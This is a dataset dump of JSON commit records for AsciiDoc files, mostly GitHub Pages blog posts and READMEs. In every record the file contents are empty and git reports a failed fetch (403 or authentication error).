{"commit":"b65132ee802a7b47ff5d93a89cfa8eb59838e1c5","subject":"Update 2016-06-11-Trabajando-con-Docker.adoc","message":"Update 
2016-06-11-Trabajando-con-Docker.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_file":"_posts\/2016-06-11-Trabajando-con-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50f7b1497acc74863352dcc770d6fc6d12b7523e","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc3cf5135b55116613cbd9ca4c79d3e3c87415bb","subject":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","message":"Update 2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_file":"_posts\/2016-05-24-Balisage-pre-conference-symposium-program-announced.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"373c7da605fc500e4b7e045a943e49a9346a9714","subject":"Update 2016-12-06-problem-solving-algorithm-intermediate01.adoc","message":"Update 2016-12-06-problem-solving-algorithm-intermediate01.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate01.adoc","new_file":"_posts\/2016-12-06-problem-solving-algorithm-intermediate01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b2557084cc52b259d23be3e18d77b1b12affe49","subject":"Update 2017-01-03-Solving-the-twitter-monetization-problem.adoc","message":"Update 2017-01-03-Solving-the-twitter-monetization-problem.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2017-01-03-Solving-the-twitter-monetization-problem.adoc","new_file":"_posts\/2017-01-03-Solving-the-twitter-monetization-problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e6b7dd6316d987bbdf2b9f4dde318fd0b31efb1","subject":"Update 2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","message":"Update 
2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","new_file":"_posts\/2015-03-02-How-to-enable-mod_rewrite-in-Apache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"130fcb8089af840447ad2955bcb606ace849f288","subject":"Update 2015-06-18-Hello-Word.adoc","message":"Update 2015-06-18-Hello-Word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-Hello-Word.adoc","new_file":"_posts\/2015-06-18-Hello-Word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ebcf717dcf7af6bad6d1d278cee3b126a88f15e","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc\n\nchage alt title","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86a7903465b07907c573eb5298fbd32795d514ab","subject":"Update 2016-07-21-2016-07-21.adoc","message":"Update 2016-07-21-2016-07-21.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-21-2016-07-21.adoc","new_file":"_posts\/2016-07-21-2016-07-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0bb45c46de7abaced0ecb8e5922066512156d78","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe157fda245938cf9452501981d0ff9b0e2241a3","subject":"Clean post error","message":"Clean post 
error","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_file":"_posts\/2016-03-28-asciidoc-ghpages-travis-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f086218e3d76a41e33c35d78459ae18a14bf4b1","subject":"Update 2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","message":"Update 2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","new_file":"_posts\/2017-04-06-This-started-as-a-Git-Hub-Gist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e9e369f85e9dcd727ed8d60a42fbcc572889a84","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0044f05d5857d1af015d96157edaab6307663d4","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cbc139343fe5c2d3c17871df9eb0e0bed5c1c15","subject":"adjust image size","message":"adjust image size\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6bea71d2f9f5ba29a6d1c229a24b7e3c5ed31520","subject":"Include instruction doesn't work, github run Asciidoc in safe mode only","message":"Include instruction doesn't work, github run Asciidoc in safe mode only\n\nSwitch from include to a link for `usage.txt`.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50fab74e51a54637233f0707ed30af9d3560120b","subject":"y2b create post A Speaker In An Ammo Box?","message":"y2b create post A Speaker In An Ammo Box?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-28-A-Speaker-In-An-Ammo-Box.adoc","new_file":"_posts\/2016-01-28-A-Speaker-In-An-Ammo-Box.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c5636292d15030b306bbd0b207dfc272aef8092","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Serial-Misc50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74ac02b6cc4b9ea89a9ecb1a29933d8bd3184dfc","subject":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","message":"Update 2017-08-24-Cloud-Front-S3-503-sorry.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_file":"_posts\/2017-08-24-Cloud-Front-S3-503-sorry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56706aab7a9080e9636f65d87bbb8d6e86877b2e","subject":"job: #12065 draft analysis of interfacing to iSim","message":"job: #12065 draft analysis of interfacing to 
iSim\n","repos":"keithbrown\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,keithbrown\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12065_isim2\/12065_isim_ant.adoc","new_file":"doc-bridgepoint\/notes\/12065_isim2\/12065_isim_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b0e797d1917f610bde7b9f697db7c4a38beac68b","subject":"Add loadbalancer entries and openstack command to README","message":"Add loadbalancer entries and openstack command to README\n","repos":"redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1a4732b3d5cb29a2f2152a9dcd8aa0abd19e4892","subject":"add README","message":"add README\n","repos":"binout\/wordpress-exit","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/wordpress-exit.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0430ca7d67a7a0e1f9c7423c15f7308a047e086e","subject":"Update 2015-07-27-test.adoc","message":"Update 2015-07-27-test.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-07-27-test.adoc","new_file":"_posts\/2015-07-27-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeb063fd6130a861ccafab240b2961837de09eef","subject":"Update 2016-08-20-TEST.adoc","message":"Update 
2016-08-20-TEST.adoc","repos":"bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io,bitcowboy\/bitcowboy.github.io","old_file":"_posts\/2016-08-20-TEST.adoc","new_file":"_posts\/2016-08-20-TEST.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitcowboy\/bitcowboy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9acc9a4b562ce0027edfc5ec204b2d05547a32f2","subject":"Update 2019-08-22-okay.adoc","message":"Update 2019-08-22-okay.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-08-22-okay.adoc","new_file":"_posts\/2019-08-22-okay.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c213955f4c261f23dbcff93d5e27a652e4c0b3a1","subject":"Update 2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","message":"Update 2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","repos":"moonPress\/press.io,moonPress\/press.io,moonPress\/press.io,moonPress\/press.io","old_file":"_posts\/2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","new_file":"_posts\/2017-06-28-Souls-of-the-Labyrinth-devblog-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moonPress\/press.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48dcdc65c1beb27ae914cf6788a60d6fb640e4a7","subject":"y2b create post Bose QC15 Unboxing - At the Airport!","message":"y2b create post Bose QC15 Unboxing - At the Airport!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-06-25-Bose-QC15-Unboxing--At-the-Airport.adoc","new_file":"_posts\/2014-06-25-Bose-QC15-Unboxing--At-the-Airport.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aab59be72f98b6b29c9015d813ce0a86608fbb49","subject":"Update 2015-10-27-north_india_trip_onedayhotel.adoc","message":"Update 2015-10-27-north_india_trip_onedayhotel.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-10-27-north_india_trip_onedayhotel.adoc","new_file":"_posts\/2015-10-27-north_india_trip_onedayhotel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87340d0128b3159f189eff260fff734527dbbfef","subject":"Update README.adoc with links to client tools","message":"Update README.adoc with links to client 
tools","repos":"hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,hawkular\/hawkular-metrics,jotak\/hawkular-metrics,mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics,jotak\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics,spadgett\/hawkular-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,ppalaga\/hawkular-metrics","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"50ece2a54ad919b31e6d8078c413e760ce62a12b","subject":"Minor README updates based on review","message":"Minor README updates based on review\n","repos":"lihan\/ritzy,ritzyed\/ritzy,yakovenkodenis\/ritzy,gaurav-rygbee\/ritzy,shaunstanislaus\/ritzy,ritzyed\/ritzy,guiquanz\/ritzy,eiriklv\/ritzy,deepti2200\/ritzy,sangohan\/ritzy,sangohan\/ritzy,ritzyed\/ritzy,gaurav-rygbee\/ritzy,yakovenkodenis\/ritzy,guiquanz\/ritzy,eiriklv\/ritzy,deepti2200\/ritzy,sangohan\/ritzy,lihan\/ritzy,lihan\/ritzy,yakovenkodenis\/ritzy,deepti2200\/ritzy,gaurav-rygbee\/ritzy,shaunstanislaus\/ritzy,guiquanz\/ritzy,shaunstanislaus\/ritzy,eiriklv\/ritzy","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yakovenkodenis\/ritzy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22563d555b0c93a65814aec153f1eb7d556ffd2a","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ponymap","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ponymap.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"62199956503bc4467ff5bcf6225e8696acf75a3a","subject":"release 5.0.1.RELEASE","message":"release 5.0.1.RELEASE","repos":"terasoluna-batch\/v5-tutorial","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/terasoluna-batch\/v5-tutorial.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ffbbf9e04a07988839a8e55ade31dd6fd9d364b","subject":"Small typo in README","message":"Small typo in README\n\nThe path to make_site.sh is missing an \"s\" in \"scripts\".\n\nChange-Id: I7f2957296f1efa44fa26ce2351becb59d1679459\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/2686\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Kudu 
Jenkins\n","repos":"InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa559e0f3051c7884b4fb31b100d7c2b9107bf3f","subject":"Delete 2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","message":"Delete 2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_file":"_posts\/2016-02-05-Horizontal-Stacked-Gantt-Style-Bar-Chart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e11e801410d4eda0d4fa662f4194eddf499f7451","subject":"Update 2016-01-23-Learning-XQuery-Resources.adoc","message":"Update 2016-01-23-Learning-XQuery-Resources.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_file":"_posts\/2016-01-23-Learning-XQuery-Resources.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a5081ac73c3c8cef971c338d8731632933f6dce","subject":"Update 2017-12-03-Visual-studio-code-extension.adoc","message":"Update 2017-12-03-Visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6531b12f8d37e3ac7fdd54b69419ec546edf1ab2","subject":"\u589e\u52a0 AbstractQueuedSynchronizer \u76f8\u5173\u7684\u53c2\u8003\u8d44\u6599","message":"\u589e\u52a0 AbstractQueuedSynchronizer \u76f8\u5173\u7684\u53c2\u8003\u8d44\u6599\n","repos":"diguage\/jdk-source-analysis,diguage\/jdk-source-analysis,diguage\/jdk-source-analysis","old_file":"AbstractQueuedSynchronizer.adoc","new_file":"AbstractQueuedSynchronizer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/diguage\/jdk-source-analysis.git\/': The 
requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a62b78a586d79f02a22989919db857536c8d7f6b","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb6f9e36add4dd6c8fb845354086413751b55b82","subject":"Update 2015-07-09-Hubot-Slack-VPS.adoc","message":"Update 2015-07-09-Hubot-Slack-VPS.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-07-09-Hubot-Slack-VPS.adoc","new_file":"_posts\/2015-07-09-Hubot-Slack-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4aeb18c5dcda81c5b9f85148487f62055bcaa47","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"595007e05f4cecdf5da190eadf34608835f8252d","subject":"Pre-merge","message":"Pre-merge\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"509e821c1c6863b7949018197ca546e2008d8efa","subject":"y2b create post Turn Any Bottle Into A Speaker!","message":"y2b create post Turn Any Bottle Into A 